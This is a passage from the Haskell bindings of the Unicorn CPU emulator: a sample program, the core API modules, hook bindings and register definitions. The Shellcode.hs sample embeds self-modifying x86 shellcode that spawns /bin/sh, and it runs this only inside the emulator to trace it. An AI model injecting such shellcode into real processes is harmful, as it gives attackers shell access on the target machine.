testI386Loop testI386InvalidMemRead testI386InvalidMemWrite testI386JumpInvalid ["-64"] -> do testX8664 testX8664Syscall ["-16"] -> testX8616 -- Test memleak ["-0"] -> testI386 _ -> putStrLn $ "Syntax: " ++ progName ++ " <-16|-32|-64>" unicorn-2.1.1/bindings/haskell/samples/Shellcode.hs000066400000000000000000000127461467524106700223400ustar00rootroot00000000000000-- Sample code to trace code with Linux code with syscall import Unicorn import Unicorn.Hook import qualified Unicorn.CPU.X86 as X86 import Control.Monad.Trans.Class (lift) import qualified Data.ByteString as BS import Data.Word import qualified Numeric as N (showHex) import System.Environment -- Code to be emulated x86Code32 :: BS.ByteString x86Code32 = BS.pack [0xeb, 0x19, 0x31, 0xc0, 0x31, 0xdb, 0x31, 0xd2, 0x31, 0xc9, 0xb0, 0x04, 0xb3, 0x01, 0x59, 0xb2, 0x05, 0xcd, 0x80, 0x31, 0xc0, 0xb0, 0x01, 0x31, 0xdb, 0xcd, 0x80, 0xe8, 0xe2, 0xff, 0xff, 0xff, 0x68, 0x65, 0x6c, 0x6c, 0x6f] x86Code32Self :: BS.ByteString x86Code32Self = BS.pack [0xeb, 0x1c, 0x5a, 0x89, 0xd6, 0x8b, 0x02, 0x66, 0x3d, 0xca, 0x7d, 0x75, 0x06, 0x66, 0x05, 0x03, 0x03, 0x89, 0x02, 0xfe, 0xc2, 0x3d, 0x41, 0x41, 0x41, 0x41, 0x75, 0xe9, 0xff, 0xe6, 0xe8, 0xdf, 0xff, 0xff, 0xff, 0x31, 0xd2, 0x6a, 0x0b, 0x58, 0x99, 0x52, 0x68, 0x2f, 0x2f, 0x73, 0x68, 0x68, 0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x52, 0x53, 0x89, 0xe1, 0xca, 0x7d, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41] -- Memory address where emulation starts address :: Word64 address = 0x1000000 -- Pretty-print integral as hex showHex :: (Integral a, Show a) => a -> String showHex = flip N.showHex "" -- Pretty-print byte string as hex showHexBS :: BS.ByteString -> String showHexBS = concatMap (flip N.showHex " ") . BS.unpack -- Write a string (with a newline character) to standard output in the emulator emuPutStrLn :: String -> Emulator () emuPutStrLn = lift . putStrLn -- Calculate code length codeLength :: Num a => BS.ByteString -> a codeLength = fromIntegral . BS.length -- Callback for tracing instructions hookCode :: CodeHook () hookCode uc addr size _ = do runEmulator $ do emuPutStrLn $ "Tracing instruction at 0x" ++ showHex addr ++ ", instruction size = 0x" ++ (maybe "0" showHex size) eip <- regRead uc X86.Eip tmp <- memRead uc addr (maybe 0 id size) emuPutStrLn $ "*** EIP = " ++ showHex eip ++ " ***: " ++ showHexBS tmp return () -- Callback for handling interrupts -- ref: http://syscalls.kernelgrok.com hookIntr :: InterruptHook () hookIntr uc intno _ | intno == 0x80 = do runEmulator $ do eax <- regRead uc X86.Eax eip <- regRead uc X86.Eip case eax of -- sys_exit 1 -> do emuPutStrLn $ ">>> 0x" ++ showHex eip ++ ": interrupt 0x" ++ showHex intno ++ ", SYS_EXIT. quit!\n" stop uc -- sys_write 4 -> do -- ECX = buffer address ecx <- regRead uc X86.Ecx -- EDX = buffer size edx <- regRead uc X86.Edx -- Read the buffer in buffer <- memRead uc (fromIntegral ecx) (fromIntegral edx) err <- errno uc if err == ErrOk then emuPutStrLn $ ">>> 0x" ++ showHex eip ++ ": interrupt 0x" ++ showHex intno ++ ", SYS_WRITE. buffer = 0x" ++ showHex ecx ++ ", size = " ++ show edx ++ ", content = " ++ showHexBS buffer else emuPutStrLn $ ">>> 0x" ++ showHex eip ++ ": interrupt 0x" ++ showHex intno ++ ", SYS_WRITE. buffer = 0x" ++ showHex ecx ++ ", size = " ++ show edx ++ " (cannot get content)" _ -> emuPutStrLn $ ">>> 0x" ++ showHex eip ++ ": interrupt 0x" ++ showHex intno ++ ", EAX = 0x" ++ showHex eax return () | otherwise = return () testI386 :: IO () testI386 = do result <- runEmulator $ do emuPutStrLn "Emulate i386 code" -- Initialize emulator in X86-32bit mode uc <- open ArchX86 [Mode32] -- Map 2MB memory for this emulation memMap uc address (2 * 1024 * 1024) [ProtAll] -- Write machine code to be emulated to memory memWrite uc address x86Code32Self -- Initialize machine registers regWrite uc X86.Esp (fromIntegral address + 0x200000) -- Tracing all instructions by having @begin > @end codeHookAdd uc hookCode () 1 0 -- Handle interrupt ourself interruptHookAdd uc hookIntr () 1 0 emuPutStrLn "\n>>> Start tracing this Linux code" -- Emulate machine code in infinite time let codeLen = codeLength x86Code32Self start uc address (address + codeLen) Nothing Nothing case result of Right _ -> putStrLn "\n>>> Emulation done." Left err -> putStrLn $ "Failed with error " ++ show err ++ ": " ++ strerror err main :: IO () main = do progName <- getProgName args <- getArgs case args of ["-32"] -> testI386 _ -> putStrLn $ "Syntax: " ++ progName ++ " <-32|-64>" unicorn-2.1.1/bindings/haskell/src/000077500000000000000000000000001467524106700172135ustar00rootroot00000000000000unicorn-2.1.1/bindings/haskell/src/Unicorn.hs000066400000000000000000000314101467524106700211630ustar00rootroot00000000000000{-| Module : Unicorn Description : The Unicorn CPU emulator. Copyright : (c) Adrian Herrera, 2016 License : GPL-2 Unicorn is a lightweight, multi-platform, multi-architecture CPU emulator framework based on QEMU. Further information is available at . -} module Unicorn ( -- * Emulator control Emulator , Engine , Architecture(..) , Mode(..) , QueryType(..) , runEmulator , open , query , start , stop -- * Register operations , regWrite , regRead , regWriteBatch , regReadBatch -- * Memory operations , MemoryPermission(..) , MemoryRegion(..) , memWrite , memRead , memMap , memUnmap , memProtect , memRegions -- * Context operations , Context , contextAllocate , contextSave , contextRestore -- * Error handling , Error(..) , errno , strerror -- * Misc. , version ) where import Control.Monad (join, liftM) import Control.Monad.Trans.Class (lift) import Control.Monad.Trans.Except (throwE, runExceptT) import Data.ByteString (ByteString, pack) import Foreign import Prelude hiding (until) import Unicorn.Internal.Core import Unicorn.Internal.Unicorn ------------------------------------------------------------------------------- -- Emulator control ------------------------------------------------------------------------------- -- | Run the Unicorn emulator and return a result on success, or an 'Error' on -- failure. runEmulator :: Emulator a -- ^ The emulation code to execute -> IO (Either Error a) -- ^ A result on success, or an 'Error' on -- failure runEmulator = runExceptT -- | Create a new instance of the Unicorn engine. open :: Architecture -- ^ CPU architecture -> [Mode] -- ^ CPU hardware mode -> Emulator Engine -- ^ A 'Unicorn' engine on success, or an 'Error' on -- failure open arch mode = do (err, ucPtr) <- lift $ ucOpen arch mode if err == ErrOk then -- Return a pointer to the Unicorn engine if ucOpen completed -- successfully lift $ mkEngine ucPtr else -- Otherwise return the error throwE err -- | Query internal status of the Unicorn engine. query :: Engine -- ^ 'Unicorn' engine handle -> QueryType -- ^ Query type -> Emulator Int -- ^ The result of the query query uc queryType = do (err, result) <- lift $ ucQuery uc queryType if err == ErrOk then pure result else throwE err -- | Emulate machine code for a specific duration of time. start :: Engine -- ^ 'Unicorn' engine handle -> Word64 -- ^ Address where emulation starts -> Word64 -- ^ Address where emulation stops (i.e. when this -- address is hit) -> Maybe Int -- ^ Optional duration to emulate code (in -- microseconds). -- If 'Nothing' is provided, continue to emulate -- until the code is finished -> Maybe Int -- ^ Optional number of instructions to emulate. If -- 'Nothing' is provided, emulate all the code -- available, until the code is finished -> Emulator () -- ^ An 'Error' on failure start uc begin until timeout count = do err <- lift $ ucEmuStart uc begin until (maybeZ timeout) (maybeZ count) if err == ErrOk then pure () else throwE err where maybeZ = maybe 0 id -- | Stop emulation (which was started by 'start'). -- This is typically called from callback functions registered by tracing APIs. -- -- NOTE: For now, this will stop execution only after the current block. stop :: Engine -- ^ 'Unicorn' engine handle -> Emulator () -- ^ An 'Error' on failure stop uc = do err <- lift $ ucEmuStop uc if err == ErrOk then pure () else throwE err ------------------------------------------------------------------------------- -- Register operations ------------------------------------------------------------------------------- -- | Write to register. regWrite :: Reg r => Engine -- ^ 'Unicorn' engine handle -> r -- ^ Register to write to -> Int64 -- ^ Value to write to register -> Emulator () -- ^ An 'Error' on failure regWrite uc reg value = do err <- lift $ ucRegWrite uc reg value if err == ErrOk then pure () else throwE err -- | Read register value. regRead :: Reg r => Engine -- ^ 'Unicorn' engine handle -> r -- ^ Register to read from -> Emulator Int64 -- ^ The value read from the register on success, -- or an 'Error' on failure regRead uc reg = do (err, val) <- lift $ ucRegRead uc reg if err == ErrOk then pure val else throwE err -- | Write multiple register values. regWriteBatch :: Reg r => Engine -- ^ 'Unicorn' engine handle -> [r] -- ^ List of registers to write to -> [Int64] -- ^ List of values to write to the registers -> Emulator () -- ^ An 'Error' on failure regWriteBatch uc regs vals = do err <- lift $ ucRegWriteBatch uc regs vals (length regs) if err == ErrOk then pure () else throwE err -- | Read multiple register values. regReadBatch :: Reg r => Engine -- ^ 'Unicorn' engine handle -> [r] -- ^ List of registers to read from -> Emulator [Int64] -- ^ A list of register values on success, -- or an 'Error' on failure regReadBatch uc regs = do -- Allocate an array of the given size let size = length regs join . lift . allocaArray size $ \array -> do err <- ucRegReadBatch uc regs array size if err == ErrOk then -- If ucRegReadBatch completed successfully, pack the contents of -- the array into a list and return it liftM pure (peekArray size array) else -- Otherwise return the error return $ throwE err ------------------------------------------------------------------------------- -- Memory operations ------------------------------------------------------------------------------- -- | Write to memory. memWrite :: Engine -- ^ 'Unicorn' engine handle -> Word64 -- ^ Starting memory address of bytes to write -> ByteString -- ^ The data to write -> Emulator () -- ^ An 'Error' on failure memWrite uc address bytes = do err <- lift $ ucMemWrite uc address bytes if err == ErrOk then pure () else throwE err -- | Read memory contents. memRead :: Engine -- ^ 'Unicorn' engine handle -> Word64 -- ^ Starting memory address to read -- from -> Int -- ^ Size of memory to read (in bytes) -> Emulator ByteString -- ^ The memory contents on success, or -- an 'Error' on failure memRead uc address size = do -- Allocate an array of the given size join . lift . allocaArray size $ \array -> do err <- ucMemRead uc address array size if err == ErrOk then -- If ucMemRead completed successfully, pack the contents of the -- array into a ByteString and return it liftM (pure . pack) (peekArray size array) else -- Otherwise return the error return $ throwE err -- | Map a range of memory. memMap :: Engine -- ^ 'Unicorn' engine handle -> Word64 -- ^ Start address of the new memory region to -- be mapped in. This address must be -- aligned to 4KB, or this will return with -- 'ErrArg' error -> Int -- ^ Size of the new memory region to be mapped -- in. This size must be a multiple of 4KB, or -- this will return with an 'ErrArg' error -> [MemoryPermission] -- ^ Permissions for the newly mapped region -> Emulator () -- ^ An 'Error' on failure memMap uc address size perms = do err <- lift $ ucMemMap uc address size perms if err == ErrOk then pure () else throwE err -- | Unmap a range of memory. memUnmap :: Engine -- ^ 'Unicorn' engine handle -> Word64 -- ^ Start addres of the memory region to be unmapped. -- This address must be aligned to 4KB or this will -- return with an 'ErrArg' error -> Int -- ^ Size of the memory region to be modified. This -- must be a multiple of 4KB, or this will return with -- an 'ErrArg' error -> Emulator () -- ^ An 'Error' on failure memUnmap uc address size = do err <- lift $ ucMemUnmap uc address size if err == ErrOk then pure () else throwE err -- | Change permissions on a range of memory. memProtect :: Engine -- ^ 'Unicorn' engine handle -> Word64 -- ^ Start address of the memory region to -- modify. This address must be aligned to -- 4KB, or this will return with an -- 'ErrArg' error -> Int -- ^ Size of the memory region to be -- modified. This size must be a multiple -- of 4KB, or this will return with an -- 'ErrArg' error -> [MemoryPermission] -- ^ New permissions for the mapped region -> Emulator () -- ^ An 'Error' on failure memProtect uc address size perms = do err <- lift $ ucMemProtect uc address size perms if err == ErrOk then pure () else throwE err -- | Retrieve all memory regions mapped by 'memMap'. memRegions :: Engine -- ^ 'Unicorn' engine handle -> Emulator [MemoryRegion] -- ^ A list of memory regions memRegions uc = do (err, regionPtr, count) <- lift $ ucMemRegions uc if err == ErrOk then do regions <- lift $ peekArray count regionPtr pure regions else throwE err ------------------------------------------------------------------------------- -- Context operations ------------------------------------------------------------------------------- -- | Allocate a region that can be used to perform quick save/rollback of the -- CPU context, which includes registers and some internal metadata. Contexts -- may not be shared across engine instances with differing architectures or -- modes. contextAllocate :: Engine -- ^ 'Unicon' engine handle -> Emulator Context -- ^ A CPU context contextAllocate uc = do (err, contextPtr) <- lift $ ucContextAlloc uc if err == ErrOk then -- Return a CPU context if ucContextAlloc completed successfully lift $ mkContext contextPtr else throwE err -- | Save a copy of the internal CPU context. contextSave :: Engine -- ^ 'Unicorn' engine handle -> Context -- ^ A CPU context -> Emulator () -- ^ An error on failure contextSave uc context = do err <- lift $ ucContextSave uc context if err == ErrOk then pure () else throwE err -- | Restore the current CPU context from a saved copy. contextRestore :: Engine -- ^ 'Unicorn' engine handle -> Context -- ^ A CPU context -> Emulator () -- ^ An error on failure contextRestore uc context = do err <- lift $ ucContextRestore uc context if err == ErrOk then pure () else throwE err ------------------------------------------------------------------------------- -- Misc. ------------------------------------------------------------------------------- -- | Combined API version & major and minor version numbers. Returns a -- hexadecimal number as (major << 8 | minor), which encodes both major and -- minor versions. version :: Int version = ucVersion nullPtr nullPtr -- | Report the 'Error' of the last failed API call. errno :: Engine -- ^ 'Unicorn' engine handle -> Emulator Error -- ^ The last 'Error' code errno = lift . ucErrno -- | Return a string describing the given 'Error'. strerror :: Error -- ^ The 'Error' code -> String -- ^ Description of the error code strerror = ucStrerror unicorn-2.1.1/bindings/haskell/src/Unicorn/000077500000000000000000000000001467524106700206305ustar00rootroot00000000000000unicorn-2.1.1/bindings/haskell/src/Unicorn/CPU/000077500000000000000000000000001467524106700212575ustar00rootroot00000000000000unicorn-2.1.1/bindings/haskell/src/Unicorn/CPU/Arm.chs000066400000000000000000000011471467524106700225000ustar00rootroot00000000000000{-# LANGUAGE ForeignFunctionInterface #-} {-| Module : Unicorn.CPU.Arm Description : Definitions for the ARM architecture. Copyright : (c) Adrian Herrera, 2016 License : GPL-2 Definitions for the ARM architecture. -} module Unicorn.CPU.Arm ( Register(..) ) where import Unicorn.Internal.Core (Reg) {# context lib = "unicorn" #} #include -- | ARM registers. {# enum uc_arm_reg as Register { underscoreToCase } omit ( UC_ARM_REG_INVALID , UC_ARM_REG_ENDING ) with prefix = "UC_ARM_REG_" deriving (Show, Eq, Bounded) #} instance Reg Register unicorn-2.1.1/bindings/haskell/src/Unicorn/CPU/Arm64.chs000066400000000000000000000012131467524106700226440ustar00rootroot00000000000000{-# LANGUAGE ForeignFunctionInterface #-} {-| Module : Unicorn.CPU.Arm64 Description : Definitions for the ARM64 (ARMv8) architecture. Copyright : (c) Adrian Herrera, 2016 License : GPL-2 Definitions for the ARM64 (ARMv8) architecture. -} module Unicorn.CPU.Arm64 ( Register(..) ) where import Unicorn.Internal.Core (Reg) {# context lib = "unicorn" #} #include -- | ARM64 registers. {# enum uc_arm64_reg as Register { underscoreToCase } omit ( UC_ARM64_REG_INVALID , UC_ARM64_REG_ENDING ) with prefix = "UC_ARM64_REG_" deriving (Show, Eq, Bounded) #} instance Reg Register unicorn-2.1.1/bindings/haskell/src/Unicorn/CPU/M68k.chs000066400000000000000000000011641467524106700225050ustar00rootroot00000000000000{-# LANGUAGE ForeignFunctionInterface #-} {-| Module : Unicorn.CPU.Mk68k Description : Definitions for the MK68K architecture. Copyright : (c) Adrian Herrera, 2016 License : GPL-2 Definitions for the MK68K architecture. -} module Unicorn.CPU.M68k ( Register(..) ) where import Unicorn.Internal.Core (Reg) {# context lib = "unicorn" #} #include -- | M68K registers. {# enum uc_m68k_reg as Register { underscoreToCase } omit ( UC_M68K_REG_INVALID , UC_M68K_REG_ENDING ) with prefix = "UC_M68K_REG_" deriving (Show, Eq, Bounded) #} instance Reg Register unicorn-2.1.1/bindings/haskell/src/Unicorn/CPU/Mips.chs000066400000000000000000000030511467524106700226650ustar00rootroot00000000000000{-# LANGUAGE ForeignFunctionInterface #-} {-| Module : Unicorn.CPU.Mips Description : Definitions for the MIPS architecture. Copyright : (c) Adrian Herrera, 2016 License : GPL-2 Definitions for the MIPS architecture. -} module Unicorn.CPU.Mips ( Register(..) ) where import Unicorn.Internal.Core (Reg) {# context lib = "unicorn" #} #include -- | MIPS registers. {# enum UC_MIPS_REG as Register { underscoreToCase , UC_MIPS_REG_0 as Reg0g , UC_MIPS_REG_1 as Reg1g , UC_MIPS_REG_2 as Reg2g , UC_MIPS_REG_3 as Reg3g , UC_MIPS_REG_4 as Reg4g , UC_MIPS_REG_5 as Reg5g , UC_MIPS_REG_6 as Reg6g , UC_MIPS_REG_7 as Reg7g , UC_MIPS_REG_8 as Reg8g , UC_MIPS_REG_9 as Reg9g , UC_MIPS_REG_10 as Reg10g , UC_MIPS_REG_11 as Reg11g , UC_MIPS_REG_12 as Reg12g , UC_MIPS_REG_13 as Reg13g , UC_MIPS_REG_14 as Reg14g , UC_MIPS_REG_15 as Reg15g , UC_MIPS_REG_16 as Reg16g , UC_MIPS_REG_17 as Reg17g , UC_MIPS_REG_18 as Reg18g , UC_MIPS_REG_19 as Reg19g , UC_MIPS_REG_20 as Reg20g , UC_MIPS_REG_21 as Reg21g , UC_MIPS_REG_22 as Reg22g , UC_MIPS_REG_23 as Reg23g , UC_MIPS_REG_24 as Reg24g , UC_MIPS_REG_25 as Reg25g , UC_MIPS_REG_26 as Reg26g , UC_MIPS_REG_27 as Reg27g , UC_MIPS_REG_28 as Reg28g , UC_MIPS_REG_29 as Reg29g , UC_MIPS_REG_30 as Reg30g , UC_MIPS_REG_31 as Reg31 } omit ( UC_MIPS_REG_INVALID , UC_MIPS_REG_ENDING ) with prefix = "UC_MIPS_REG_" deriving (Show, Eq, Bounded) #} instance Reg Register unicorn-2.1.1/bindings/haskell/src/Unicorn/CPU/Sparc.chs000066400000000000000000000011721467524106700230270ustar00rootroot00000000000000{-# LANGUAGE ForeignFunctionInterface #-} {-| Module : Unicorn.CPU.Sparc Description : Definitions for the SPARC architecture. Copyright : (c) Adrian Herrera, 2016 License : GPL-2 Definitions for the SPARC architecture. -} module Unicorn.CPU.Sparc ( Register(..) ) where import Unicorn.Internal.Core (Reg) {# context lib = "unicorn" #} #include -- | SPARC registers. {# enum uc_sparc_reg as Register { underscoreToCase } omit (UC_SPARC_REG_INVALID , UC_SPARC_REG_ENDING ) with prefix = "UC_SPARC_REG_" deriving (Show, Eq, Bounded) #} instance Reg Register unicorn-2.1.1/bindings/haskell/src/Unicorn/CPU/X86.chs000066400000000000000000000037121467524106700223460ustar00rootroot00000000000000{-# LANGUAGE ForeignFunctionInterface #-} {-| Module : Unicorn.CPU.X86 Description : Definitions for the X86 architecture. Copyright : (c) Adrian Herrera, 2016 License : GPL-2 Definitions for the X86 architecture. -} module Unicorn.CPU.X86 ( Mmr(..) , Register(..) , Instruction(..) ) where import Control.Applicative import Data.Word import Foreign import Unicorn.Internal.Core (Reg) {# context lib = "unicorn" #} #include -- | Memory-managemen Register for instructions IDTR, GDTR, LDTR, TR. -- Borrow from SegmentCache in qemu/target-i386/cpu.h data Mmr = Mmr { mmrSelector :: Word16 -- ^ Not used by GDTR and IDTR , mmrBase :: Word64 -- ^ Handle 32 or 64 bit CPUs , mmrLimit :: Word32 , mmrFlags :: Word32 -- ^ Not used by GDTR and IDTR } instance Storable Mmr where sizeOf _ = {# sizeof uc_x86_mmr #} alignment _ = {# alignof uc_x86_mmr #} peek p = Mmr <$> liftA fromIntegral ({# get uc_x86_mmr->selector #} p) <*> liftA fromIntegral ({# get uc_x86_mmr->base #} p) <*> liftA fromIntegral ({# get uc_x86_mmr->limit #} p) <*> liftA fromIntegral ({# get uc_x86_mmr->flags #} p) poke p mmr = do {# set uc_x86_mmr.selector #} p (fromIntegral $ mmrSelector mmr) {# set uc_x86_mmr.base #} p (fromIntegral $ mmrBase mmr) {# set uc_x86_mmr.limit #} p (fromIntegral $ mmrLimit mmr) {# set uc_x86_mmr.flags #} p (fromIntegral $ mmrFlags mmr) -- | X86 registers. {# enum uc_x86_reg as Register { underscoreToCase } omit ( UC_X86_REG_INVALID , UC_X86_REG_ENDING ) with prefix = "UC_X86_REG_" deriving (Show, Eq, Bounded) #} instance Reg Register -- | X86 instructions. {# enum uc_x86_insn as Instruction { underscoreToCase } omit ( UC_X86_INS_INVALID , UC_X86_INS_ENDING ) with prefix = "UC_X86_INS_" deriving (Show, Eq, Bounded) #} unicorn-2.1.1/bindings/haskell/src/Unicorn/Hook.hs000066400000000000000000000220211467524106700220610ustar00rootroot00000000000000{-| Module : Unicorn.Hook Description : Unicorn hooks. Copyright : (c) Adrian Herrera, 2016 License : GPL-2 Insert hook points into the Unicorn emulator engine. -} module Unicorn.Hook ( -- * Hook types Hook , MemoryHookType(..) , MemoryEventHookType(..) , MemoryAccess(..) -- * Hook callbacks , CodeHook , InterruptHook , BlockHook , InHook , OutHook , SyscallHook , MemoryHook , MemoryReadHook , MemoryWriteHook , MemoryEventHook -- * Hook callback management , codeHookAdd , interruptHookAdd , blockHookAdd , inHookAdd , outHookAdd , syscallHookAdd , memoryHookAdd , memoryEventHookAdd , hookDel ) where import Control.Monad import Control.Monad.Trans.Class import Control.Monad.Trans.Except (ExceptT (..), throwE) import Foreign import Unicorn.Internal.Core import Unicorn.Internal.Hook import qualified Unicorn.CPU.X86 as X86 ------------------------------------------------------------------------------- -- Hook callback management (registration and deletion) ------------------------------------------------------------------------------- -- | Register a callback for a code hook event. codeHookAdd :: Storable a => Engine -- ^ 'Unicorn' engine handle -> CodeHook a -- ^ Code hook callback -> a -- ^ User-defined data. This will be passed to -- the callback function -> Word64 -- ^ Start address -> Word64 -- ^ End address -> Emulator Hook -- ^ The hook handle on success, or an 'Error' -- on failure codeHookAdd uc callback userData begin end = ExceptT . alloca $ \userDataPtr -> do poke userDataPtr userData funPtr <- marshalCodeHook callback getResult $ ucHookAdd uc HookCode funPtr userDataPtr begin end -- | Register a callback for an interrupt hook event. interruptHookAdd :: Storable a => Engine -- ^ 'Unicorn' engine handle -> InterruptHook a -- ^ Interrupt callback -> a -- ^ User-defined data. This will be passed -- to the callback function -> Word64 -- ^ Start address -> Word64 -- ^ End address -> Emulator Hook -- ^ The hook handle on success, or 'Error' -- on failure interruptHookAdd uc callback userData begin end = ExceptT . alloca $ \userDataPtr -> do poke userDataPtr userData funPtr <- marshalInterruptHook callback getResult $ ucHookAdd uc HookIntr funPtr userDataPtr begin end -- | Register a callback for a block hook event. blockHookAdd :: Storable a => Engine -- ^ 'Unicorn' engine handle -> BlockHook a -- ^ Block callback -> a -- ^ User-defined data. This will be passed to -- the callback function -> Word64 -- ^ Start address -> Word64 -- ^ End address -> Emulator Hook -- ^ The hook handle on success, or an 'Error' -- on failure blockHookAdd uc callback userData begin end = ExceptT . alloca $ \userDataPtr -> do poke userDataPtr userData funPtr <- marshalBlockHook callback getResult $ ucHookAdd uc HookBlock funPtr userDataPtr begin end -- | Register a callback for an IN instruction hook event (X86). inHookAdd :: Storable a => Engine -- ^ 'Unicorn' engine handle -> InHook a -- ^ IN instruction callback -> a -- ^ User-defined data. This will be passed to the -- callback function -> Word64 -- ^ Start address -> Word64 -- ^ End address -> Emulator Hook -- ^ The hook handle on success, or an 'Error' on -- failure inHookAdd uc callback userData begin end = ExceptT . alloca $ \userDataPtr -> do poke userDataPtr userData funPtr <- marshalInHook callback getResult $ ucInsnHookAdd uc HookInsn funPtr userDataPtr begin end X86.In -- | Register a callback for an OUT instruction hook event (X86). outHookAdd :: Storable a => Engine -- ^ 'Unicorn' engine handle -> OutHook a -- ^ OUT instruction callback -> a -- ^ User-defined data. This will be passed to the -- callback function -> Word64 -- ^ Start address -> Word64 -- ^ End address -> Emulator Hook -- ^ The hook handle on success, or an 'Error' on -- failure outHookAdd uc callback userData begin end = ExceptT . alloca $ \userDataPtr -> do poke userDataPtr userData funPtr <- marshalOutHook callback getResult $ ucInsnHookAdd uc HookInsn funPtr userDataPtr begin end X86.Out -- | Register a callback for a SYSCALL instruction hook event (X86). syscallHookAdd :: Storable a => Engine -- ^ 'Unicorn' engine handle -> SyscallHook a -- ^ SYSCALL instruction callback -> a -- ^ User-defined data. This will be passed to -- the callback function -> Word64 -- ^ Start address -> Word64 -- ^ End address -> Emulator Hook -- ^ The hook handle on success, or an 'Error' -- on failure syscallHookAdd uc callback userData begin end = ExceptT . alloca $ \userDataPtr -> do poke userDataPtr userData funPtr <- marshalSyscallHook callback getResult $ ucInsnHookAdd uc HookInsn funPtr userDataPtr begin end X86.Syscall -- | Register a callback for a valid memory access event. memoryHookAdd :: Storable a => Engine -- ^ 'Unicorn' engine handle -> MemoryHookType -- ^ A valid memory access (e.g. read, write, -- etc.) to trigger the callback on -> MemoryHook a -- ^ Memory access callback -> a -- ^ User-defined data. This will be passed to -- the callback function -> Word64 -- ^ Start address -> Word64 -- ^ End address -> Emulator Hook -- ^ The hook handle on success, or an 'Error' -- on failure memoryHookAdd uc memHookType callback userData begin end = ExceptT . alloca $ \userDataPtr -> do poke userDataPtr userData funPtr <- marshalMemoryHook callback getResult $ ucHookAdd uc memHookType funPtr userDataPtr begin end -- | Register a callback for an invalid memory access event. memoryEventHookAdd :: Storable a => Engine -- ^ 'Unicorn' engine handle -> MemoryEventHookType -- ^ An invalid memory access (e.g. -- read, write, etc.) to trigger -- the callback on -> MemoryEventHook a -- ^ Invalid memory access callback -> a -- ^ User-defined data. This will -- be passed to the callback -- function -> Word64 -- ^ Start address -> Word64 -- ^ End address -> Emulator Hook -- ^ The hook handle on success, or -- an 'Error' on failure memoryEventHookAdd uc memEventHookType callback userData begin end = ExceptT . alloca $ \userDataPtr -> do poke userDataPtr userData funPtr <- marshalMemoryEventHook callback getResult $ ucHookAdd uc memEventHookType funPtr userDataPtr begin end -- | Unregister (remove) a hook callback. hookDel :: Engine -- ^ 'Unicorn' engine handle -> Hook -- ^ 'Hook' handle -> Emulator () -- ^ 'ErrOk' on success, or other value on failure hookDel uc hook = do err <- lift $ ucHookDel uc hook if err == ErrOk then pure () else throwE err ------------------------------------------------------------------------------- -- Helper functions ------------------------------------------------------------------------------- -- Takes the tuple returned by `ucHookAdd`, an IO (Error, Hook), and -- returns either a `Right Hook` if no error occurred or a `Left Error` if an -- error occurred getResult :: IO (Error, Hook) -> IO (Either Error Hook) getResult = liftM (uncurry checkResult) where checkResult err hook = if err == ErrOk then Right hook else Left err unicorn-2.1.1/bindings/haskell/src/Unicorn/Internal/000077500000000000000000000000001467524106700224045ustar00rootroot00000000000000unicorn-2.1.1/bindings/haskell/src/Unicorn/Internal/Core.chs000066400000000000000000000025721467524106700240010ustar00rootroot00000000000000{-# LANGUAGE ForeignFunctionInterface #-} {-| Module : Unicorn.Internal.Core Description : Core Unicorn components. Copyright : (c) Adrian Herrera, 2016 License : GPL-2 Defines core Unicorn components. This module should not be directly imported; it is only exposed because of the way cabal handles ordering of chs files. -} module Unicorn.Internal.Core where import Control.Monad import Control.Monad.Trans.Except (ExceptT) import Foreign {# context lib = "unicorn" #} #include #include "unicorn_wrapper.h" -- | The Unicorn engine. {# pointer *uc_engine as Engine foreign finalizer uc_close_wrapper as close newtype #} -- | A pointer to a Unicorn engine. {# pointer *uc_engine as EnginePtr -> Engine #} -- | Make a new Unicorn engine out of an engine pointer. The returned Unicorn -- engine will automatically call 'uc_close_wrapper' when it goes out of scope. mkEngine :: EnginePtr -> IO Engine mkEngine ptr = liftM Engine (newForeignPtr close ptr) -- | Errors encountered by the Unicorn API. These values are returned by -- 'errno'. {# enum uc_err as Error { underscoreToCase } with prefix = "UC_" deriving (Show, Eq, Bounded) #} -- | The emulator runs in the IO monad and allows for the handling of errors -- "under the hood". type Emulator a = ExceptT Error IO a -- | An architecture-dependent register. class Enum a => Reg a unicorn-2.1.1/bindings/haskell/src/Unicorn/Internal/Hook.chs000066400000000000000000000363751467524106700240210ustar00rootroot00000000000000{-# LANGUAGE ForeignFunctionInterface #-} {-| Module : Unicorn.Internal.Hook Description : Unicorn hooks. Copyright : (c) Adrian Herrera, 2016 License : GPL-2 Low-level bindings for inserting hook points into the Unicorn emulator engine. This module should not be directly imported; it is only exposed because of the way cabal handles ordering of chs files. -} module Unicorn.Internal.Hook ( -- * Types Hook , HookType(..) , MemoryHookType(..) , MemoryEventHookType(..) , MemoryAccess(..) -- * Hook callback bindings , CodeHook , InterruptHook , BlockHook , InHook , OutHook , SyscallHook , MemoryHook , MemoryReadHook , MemoryWriteHook , MemoryEventHook -- * Hook marshallin , marshalCodeHook , marshalInterruptHook , marshalBlockHook , marshalInHook , marshalOutHook , marshalSyscallHook , marshalMemoryHook , marshalMemoryReadHook , marshalMemoryWriteHook , marshalMemoryEventHook -- * Hook registration and deletion bindings , ucHookAdd , ucInsnHookAdd , ucHookDel ) where import Control.Monad import Foreign import Unicorn.Internal.Util {# import Unicorn.Internal.Core #} {# import Unicorn.CPU.X86 #} {# context lib = "unicorn" #} #include #include "unicorn_wrapper.h" ------------------------------------------------------------------------------- -- Types ------------------------------------------------------------------------------- -- When we pass a Unicorn engine to a hook callback, we do not want this engine -- object to be freed automatically when the callback returns (which is what -- would typically occur when using a ForeignPtr), because we want to continue -- using the Unicorn engine outside the callback. To avoid this, -- unicorn_wrapper.h provides a dummy "close" function that does nothing. When -- we go to create a Unicorn engine to pass to a callback, we use a pointer to -- this dummy close function as the finalizer pointer. When the callback -- returns, the Unicorn engine remains untouched! -- -- XX Is there a better way to do this? foreign import ccall "&uc_close_dummy" closeDummy :: FunPtr (EnginePtr -> IO ()) mkEngineNC :: EnginePtr -> IO Engine mkEngineNC ptr = liftM Engine (newForeignPtr closeDummy ptr) -- | A Unicorn hook. type Hook = {# type uc_hook #} -- Hook types. These are used internally within this module by the callback -- registration functions and are not exposed to the user. -- -- Note that the both valid and invalid memory access hooks are omitted from -- this enum (and are exposed to the user). {# enum uc_hook_type as HookType { underscoreToCase } omit ( UC_HOOK_MEM_READ_UNMAPPED , UC_HOOK_MEM_WRITE_UNMAPPED , UC_HOOK_MEM_FETCH_UNMAPPED , UC_HOOK_MEM_READ_PROT , 